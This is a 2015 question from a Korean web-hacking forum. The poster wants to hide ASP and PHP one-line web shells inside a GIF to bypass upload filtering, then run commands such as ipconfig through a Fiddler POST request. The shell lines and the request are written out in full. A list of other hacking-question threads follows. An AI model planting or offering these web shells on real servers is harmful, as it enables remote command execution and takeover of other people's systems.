214,

3/11

회원가입

로그인

stoopynice

웹쉘 관련 질문있습니다.

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_Web&no=209 [복사]

그 파일 업로드 우회해서 (gif 파일에 아래 코드를 넣어서)
<%execute(request("cmd"))%>
<?php eval($_POST[cmd]);?>
페이지에 삽입한다음에 ipconfig같은 명령을 실험해보고 싶은데
(위에 코드가 cmd 불러와서 cmd 명령하는거죠?)
피들러에 composer 탭에 아래 내용 보내면 되나요??
POST http://\\\\/index.php?***.gif
Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
Referer: ***/index.php
WS=110&CCODE=000101
Accept-Language: ko-KR
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
DNT: 1
Host: ***
Cookie: PHPSESSID=h6ddjfsn45r1sqc9tvg2p6pje0
Content-Length: 9
cmd=ipconfig;

요런식으로 execute해서 테스트하면되나요?

Hit : 4671 Date : 2015/07/26 12:22

174

웹해킹 방법? 질문합니다.[1]

wilmamom

01/23

4895

173

shell 에 대해 설명좀 해주세요![1]

v_0_0v_

06/04

3318

172

xss 질문입니다[1]

usj1004s

12/06

3069

171

웹 해킹 하는데 웹 개발도 할 줄 알아야 하나요?[1]

unmask

10/25

2782

170

매직쿼터 우회 방법에 대해 질문드립니다.[1]

tpdbs953

10/17

4863

169

해커 고수분들 설명좀 부탁드립니다.ㅠㅠ wpe-pro 토크온[2]

tjrqo12

10/13

7857

168

이미지안에 리다이렉트 소스(악용목적X)[2]

tjdgus1515

12/06

4621

167

XSS 해킹 질문[3]

test11

03/07

4726

166

홈페이지 디도스 원리?[1]

tbxmaos

02/12

2652

165

level1에서요...[2]

studen1

06/05

3377

웹쉘 관련 질문있습니다.

stoopynice

07/26

4670

163

Paros 툴 관련 질문[2]

stalaction

10/21

4938

162

서버시간 변경?[1]

stalaction

10/21

8202

161

서버시간 조작이 가능할까요?[1]

spe

01/07

3305

160

질문이요!![1]

sophiz

01/06

2886

159

사이트에 trojan 이 무더기로 깔렸습니다, 어떻게 지워야 하나요?[1]

someone3

02/09

4024

158

웹해킹 관련하여 질문드립니다[5]

solo20

05/21

2348

157

CloudFlare 쓰는 사이트는 해킹하기 힘들까요?[3]

sogreat

03/21

178

156

페이스북[1]

smile_mut

12/22

4127

155

완전초보라 궁금하네요 웹쉘 XSS 등[1]

sm8303

04/21

3758

[1][2] 3 [4][5][6][7][8][9][10]..[11]

Copyright 1999-2024 Zeroboard / skin by Hackerschool.org / Secure Patch by Hackerschool.org